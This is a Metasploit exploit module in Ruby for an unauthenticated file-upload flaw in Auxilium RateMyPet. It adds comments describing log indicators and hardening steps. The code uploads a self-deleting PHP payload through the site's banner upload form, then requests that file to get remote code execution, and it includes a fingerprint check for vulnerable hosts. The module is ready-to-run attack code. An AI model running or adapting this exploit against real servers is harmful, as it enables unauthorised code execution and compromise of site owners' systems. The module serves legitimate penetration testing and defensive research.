Path: blob/master/modules/exploits/multi/http/auxilium_upload_exec.rb
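##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxilium RateMyPet banner upload (OSVDB 85554, EDB 21329).
#
# The module drives the application's banner upload form
# (admin/sitebanners/upload_banners.php) with a file named *.php and then
# requests that file from the banners/ directory. It sets no credentials or
# session cookie of its own on either request.
#
# What this looks like in web server logs, as far as the code below shows:
#   * POST <base>/admin/sitebanners/upload_banners.php, multipart/form-data,
#     with a "userfile" part whose filename is five random letters + ".php"
#     and whose declared type is text/plain.
#   * A request for <base>/banners/<same name>.php right after the upload.
# The payload is requested with :unlink_self => true, so the uploaded file
# presumably removes itself once it runs (PhpEXE behaviour, not visible
# here); request logs are a better indicator than a file left on disk.
#
# Hardening that addresses what the module relies on: require an
# authenticated admin session for upload_banners.php, accept only image
# types for banners, and stop the web server from executing scripts in
# banners/.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers module metadata and the TARGETURI option.
  #
  # @param info [Hash] metadata overrides merged in by the framework
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Auxilium RateMyPet Arbitrary File Upload Vulnerability",
        'Description' => %q{
          This module exploits a vulnerability found in Auxilium RateMyPet's. The site
          banner uploading feature can be abused to upload an arbitrary file to the web
          server, which is accessible in the 'banner' directory, thus allowing remote code
          execution.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'DaOne', # Vulnerability discovery
          'sinn3r' # Metasploit
        ],
        'References' => [
          ['OSVDB', '85554'],
          ['EDB', '21329']
        ],
        'Payload' => {
          'BadChars' => "\x00"
        },
        'Platform' => %w{linux php},
        'Targets' => [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2012-09-14',
        'DefaultTarget' => 0,
        # NOTE(review): still the UNKNOWN_* placeholders. The module writes a
        # file under banners/ and issues two HTTP requests, so the side
        # effects at least could be stated once confirmed against a target.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base directory to the application', '/Auxiliumpetratepro/'])
      ]
    )
  end

  # Fingerprints the banner manager page without uploading anything.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when the host does not answer,
  #   Detected when the admin banner page title is present, Safe otherwise
  def check
    res = send_request_raw({
      'uri' => normalize_uri("#{application_base}/admin/sitebanners/upload_banners.php")
    })

    # A missing response says nothing about the target. Reporting Safe here
    # would be a false negative for anyone using check to verify exposure.
    return Exploit::CheckCode::Unknown unless res

    # Only the page title is matched, so this shows the upload form is
    # reachable, not that an upload would succeed; hence Detected.
    if res.body =~ /\<title\>Pet Rate Admin \- Banner Manager\<\/title\>/
      Exploit::CheckCode::Detected
    else
      Exploit::CheckCode::Safe
    end
  end

  # Submits the banner form with the payload as the "userfile" part, then
  # requests the uploaded file and hands over to the payload handler.
  #
  # @param base [String] application base path
  # @param php_fname [String] file name used for the upload and the follow-up request
  # @param p [String] payload body placed in the "userfile" part
  # @return [void]
  def upload_exec(base, php_fname, p)
    data = Rex::MIME::Message.new
    data.add_part('http://', nil, nil, "form-data; name=\"burl\"")
    data.add_part('', nil, nil, "form-data; name=\"alt\"")
    data.add_part(p, 'text/plain', nil, "form-data; name=\"userfile\"; filename=\"#{php_fname}\"")
    data.add_part(' Upload', nil, nil, "form-data; name=\"submitok\"")

    post_data = data.to_s

    print_status("Uploading payload (#{p.length} bytes)...")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"),
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data,
    })

    # The upload response is only checked for presence; its status code and
    # body are not inspected.
    unless res
      print_error("No response from host")
      return
    end

    print_status("Requesting '#{php_fname}'...")
    res = send_request_raw({ 'uri' => normalize_uri("#{base}/banners/#{php_fname}") })
    if res && res.code == 404
      print_error("Upload unsuccessful: #{res.code}")
      return
    end

    handler
  end

  # Builds a random .php file name and a self-deleting payload, then runs
  # the upload/request sequence.
  #
  # @return [void]
  def exploit
    php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"

    p = get_write_exec_payload(:unlink_self => true)

    upload_exec(application_base, php_fname, p)
  end

  private

  # Application base path derived from TARGETURI, shared by check and exploit.
  #
  # The trailing slash is forced before File.dirname so that a TARGETURI given
  # without one ("/app") resolves to "/app" rather than to its parent "/".
  # check previously skipped this step and could probe the wrong path.
  #
  # @return [String]
  def application_base
    uri = normalize_uri(target_uri.path)
    uri << '/' unless uri.end_with?('/')
    File.dirname("#{uri}.")
  end
end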